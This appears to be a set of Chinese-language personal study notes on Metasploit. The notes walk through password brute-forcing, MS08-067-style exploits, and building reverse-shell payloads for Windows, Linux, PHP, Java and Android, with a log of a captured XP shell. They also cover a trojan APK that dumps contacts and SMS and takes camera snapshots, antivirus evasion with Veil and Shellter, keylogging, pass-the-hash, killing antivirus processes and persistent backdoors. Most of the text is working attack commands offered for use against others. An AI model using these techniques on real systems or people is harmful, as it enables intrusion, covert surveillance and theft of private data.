密码破解模块
Ssh服务口令猜测
SSH 为 Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层和传输层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题
!!!!!!!!!!!!
如果知道什么漏洞,然后想找模块,就如
Search ms08_067
msf > search ms08_067
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
比如针对ssh的口令
也是
Search ssh
然后去找msf > search ssh_logName
Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ssh/ssh_login normal SSH Login Check Scanner
auxiliary/scanner/ssh/ssh_login_pubkey normal SSH Public Key Login Scanner
查看参数
进行设置
Set RHOSTS IP
Set PASS_FILE 密码文件
Set USENAME 用户名,也可以是用户名字典
Exploit 就开始进行爆破了
破解口令就是login
msf > search mysql_login
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/mysql/mysql_login normal MySQL Login Utility
几乎就是一样的,直接search XXX
然后use 返回的目录,然后设置参数
然后exploit
Tomact~~~~
同样
然后设置参数
用户,密码字典文件
SMB
同样~~~
漏洞利用模块
常用命令
用指定关键字搜索可利用漏洞
Search 名
Use 模块路径 就可以使用了。
查看参数
Show options
Show targets 显示目标(os版本)
Set TARGET 设置目标版本
Exploit 开始漏洞攻击
Sessions -l 列出会话
Sessions -i 选择会话
Sessions -k 结束会话
Ctrl+z 把会话放到后台
Ctrl+c 结束会话
Show auxiliary 显示辅助模块
Use auxiliary name 使用辅助模块
Run 运行模块
如
MS01_002
显示的里面设置
设置载荷
Set payload windows/meterpreter/reverse_tcp
SRVHOST 0.0.0.0 设置的是自己的IP
以这个做网址,让别人来访问
也可以设置端口
设置根目录 set URLPATH/
Set LHOST 自己IP 作为反弹SHELL连接的IP
Set LPORT 反弹回来连接的端口
访问后,会产生一个会话,然后
Sessions -i
看看会话
Sessions -i ID
选择会话后
进入
Meterpreter>
这就拿到系统权限了
还有ms10_018
也试了下,,我的xp没成功。。。
Ms10_046
Ms08_067
直接就可以攻击,“`
Ms12-004
LInux samba漏洞
影响 Samba 3.0 debain
Shellcode的使用
在目标机器上运行一段机器指令,返回shell
Shellcode
Windows
Linux
Android
Java
Php
生成shellcode
因为我的kali 升级了,没有了msfpayload
直接在终端下输入
要用msfvenom ,并且要 -P 才可以产生payload
监听shellcode
在msf下
use exploit/multi/handler
设置载荷,和生成的要一样,设置IP和端口也要一样
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.150.131
LHOST => 192.168.150.131
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options
攻击,开始监听
运行后
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.150.131:4444
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 192.168.150.128
[*] Meterpreter session 1 opened (192.168.150.131:4444 -> 192.168.150.128:1828) at 2016-07-15 05:53:15 +0800
meterpreter > shell
Process 3356 created.
Channel 1 created.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\����>
C:\Documents and Settings\Administrator\����>
C:\Documents and Settings\Administrator\����>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter ��������:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.150.128
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.150.2
生成linux shellcode
与window不同的就是载荷不同
Linux/x86/meterpreter/reverse_tcp
其他一样
Linux的是没有后缀
运行时 ./文件名
Java也是就是payload不同
Java/meterpreter/reverse_tcp
PHP
Php/meterpreter/reverse_tcp
-f 选择输出文件类型
去访问就拿到了~
入侵安卓
都一样的
贴下给的文本
入侵安卓手机
首先入侵手机的原理是 你需要生成一个安卓手机的木马程序xxx.apk 安卓安装程序安装到你的手机上去。
然后运行这个安卓程序。然后这个木马就会反弹连接你的电脑,然后你就可以控制他的手机了,原理就这些
首先条件就是
1 网络能够联通,手机木马反连接你 他的手机首先能上网,你的ip得是外网ip,如果在内网也可以。
2 你需要想办法让他安装你生成的木马并运行。就ok了
步骤1
生成木马程序 192.168.1.105 我的电脑ip 7777是反连接我的端口号,不能用已经使用的端口号。
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=7777 R > /root/cracer.apk
生成木马的位置名字cracer.apk
use exploit/mutli/handler
set payload android/meterpreter/reverse_tcp
set LHOST 172.16.1.105
exploit
打开msf用来侦听反连接的木马
ok 生成完毕了 吧生成好的木马拿出来发给手机
我安装上安卓木马
安装完打开
我们看侦听的结果
ok 我打开木马
反链我了
dump_contacts –这个是导出电话
dump_sms –这个是导出信息
Webcam_list可以看到有几个摄像头
-i 1 是选择后摄像头
webcam_snap 是拍照 ,看到我电脑了
webcam_stream 开启摄像头
Shellcode的常规免杀
最好使用别的免杀工具
使用多重编码免杀
现在使用的话会被杀~~~
加壳
Upx -5 文件名
Veil免杀(用这个)
或者用国外的免杀
Shellter免杀
下载shellter
Unzip 解压
在解压shellter_v4.9zip
运行shellter.exe
先给权限
Chmod 777
./shellter.exe
显示红酒瓶
输入A
PE Target:/root/putty1.exe
他会自动备份
会让你选择payload
输入
L
选择第一个
1
输入反弹监听的IP
端口
在msf中设置监听
Payload就是windows那个
同样设置IP和端口
生成的文件就是puttry1.exe
这个就是木马了
可以过360~~~
Meterpreter常用命令
Screenshot 截屏
Sysinfo 获取系统运行的平台
Keyscan_start
Keyscan_dump
获取键盘记录
Ps 查看进行
Migrate 1774 切换进行
Run post/windows/capture/keylog_recoder
记录键盘输入
利用hash登陆
获取hash
Hashdump
管理员的MD5加密值
在msf下
Use exploit/windows/smb/psexec
设置载荷,就是之前的反弹连接的载荷
要设置被攻击电脑的IP
设置 登陆名称
Hash值
持久控制
进程迁移
Run post/windows/manage/migrate
关闭杀软
可以去强制结束杀毒的进程
Kill 进程id
查看目标主机所有流量
Run packetrecorder -i 1
提取系统信息
Run scraper
持久控制
Run persistence -X -i 50 -p 端口 -r 自己的IP
就可以让他没50秒连接一次我
然后正常的监听
持久控制服务器
也是先生成马
监听
安装长久的后门
Run metsvc -A
然后在msf下
还是设置监听,载荷
31337 端口
附
开3389
使用批处理
exe
Sql说
也就是说可以上网查开3389的bat~~~